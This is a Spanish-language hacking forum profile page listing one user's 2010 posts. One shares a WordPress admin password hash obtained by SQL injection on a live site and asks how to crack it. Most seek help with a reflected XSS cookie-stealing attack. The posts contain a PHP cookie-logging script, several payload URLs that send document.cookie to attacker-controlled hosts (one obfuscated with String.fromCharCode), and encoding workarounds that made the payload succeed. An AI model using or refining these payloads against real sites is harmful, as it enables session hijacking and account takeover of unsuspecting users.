Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - [{O_o}]

Páginas 1 2 3 4 5
#11
Nivel Web / Worpress HASH
4 Noviembre 2010, 21:21 PM
Saludos a todos mi pregunta es algo sencilla no se si va en esta parte del foro pero aqui va hice un ataque de sql injection a una pagina web de wordpress como resultado tengo esto:

admin:$P$BvlIB.luCxq7KHJI5Xom4nEZhqGDgq/


Alguien me podria decir que tipo de encriptacion esta y si hay algun tools ya que al principio pense que era sha o des pero no es asi.

Gracias
#12
Nivel Web / Re: XSS Help!!!
11 Febrero 2010, 00:26 AM
yo lo prove concatenando el la url + el cookie
de este manera

"miurl.com"+document.cookie;
y despues probe

"miurl.com"%2bdocument.cookie; y asi si funciona!
es por el magic quote. gracias no mantenemos en conctato!

#13
Nivel Web / Re: XSS Help!!!
10 Febrero 2010, 23:49 PM
Ya mucha gracias lo hice con unicode para la url y me funciono perfectamente jijiji
#14
Nivel Web / Re: XSS Help!!!
10 Febrero 2010, 23:16 PM
"><script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 105, 109, 117, 115, 97, 46, 117, 115, 47, 99, 46, 112, 104, 112, 63, 99, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 115, 99, 114, 105, 112, 116, 62))</script>


esto fue lo que puse y no salio nada
#15
Nivel Web / Re: XSS Help!!!
10 Febrero 2010, 23:09 PM
No funciona tio

con el code tratat de agregarle el + document.cookie; al ejemplo que me diste a ver si te junciona.

Gracias
#16
Nivel Web / Re: XSS Help!!!
10 Febrero 2010, 23:02 PM
Solo la puse asi para que ustedes trataran!!!
#17
Nivel Web / Re: XSS Help!!!
10 Febrero 2010, 22:49 PM
chmod 777 c.php
PHP SCRIPT:

<?php
$cookie = urldecode($_GET['c']);
$fp = fopen("log.txt", "a");
$cookie = $cookie . ": ".$_SERVER['REMOTE_ADDR']." at ".date("r",time())."\n";
fwrite($fp, "$cookie \n");
fclose($fp);
header("Location: http://google.com ");
?>

XSS BUG URL:

http://victima.com?r="><script>selft.location='http://url.com/c.php?c='+document.cookie;</script>

LOG.TXT:

pero si pongo

http://victima?r="><script>selft.location='http://url.com/c.php?c=';</script>

LOG.TXT:
: x.x.x.x at Wed, 10 Feb 2010 10:56:34 -0400

Gracias!

#18
Nivel Web / Re: XSS Help!!!
10 Febrero 2010, 22:38 PM
Esa parte funciona correctamente la parte que no me funciona es al agregarle el + document.cookie; al javascript voy intentar con el encode.
#19
Nivel Web / Re: XSS Help!!!
10 Febrero 2010, 21:47 PM
http://vitima.com/01109417885/empty_personal.phtml?r="><script>selft.location='http://mypage.com/c.php?cookie='+document.cookie;</script>

Nada no funciona y sigue pasando lo mismo si le quito el + document.cookie funciona normal.
#20
Nivel Web / Re: XSS Help!!!
10 Febrero 2010, 19:12 PM
Shell Root

"><script>document.location='http://mysite.us/c.php?cookie='+ document.cookie;</script>

Tampoco funciono!! no me manda al link es como que no concatena la intruccion del javascript es decir al poner esto en address bar

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie='+document.cookie;</script>

no me manda a la pagina web del javascript a donde esta el cookie stealer pero si le quito la concatanacion es decir  
URL + document.cookie;

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie=';</script>

funciona entoces el problema esta en el + document.cookie; que no me concatena.
Páginas 1 2 3 4 5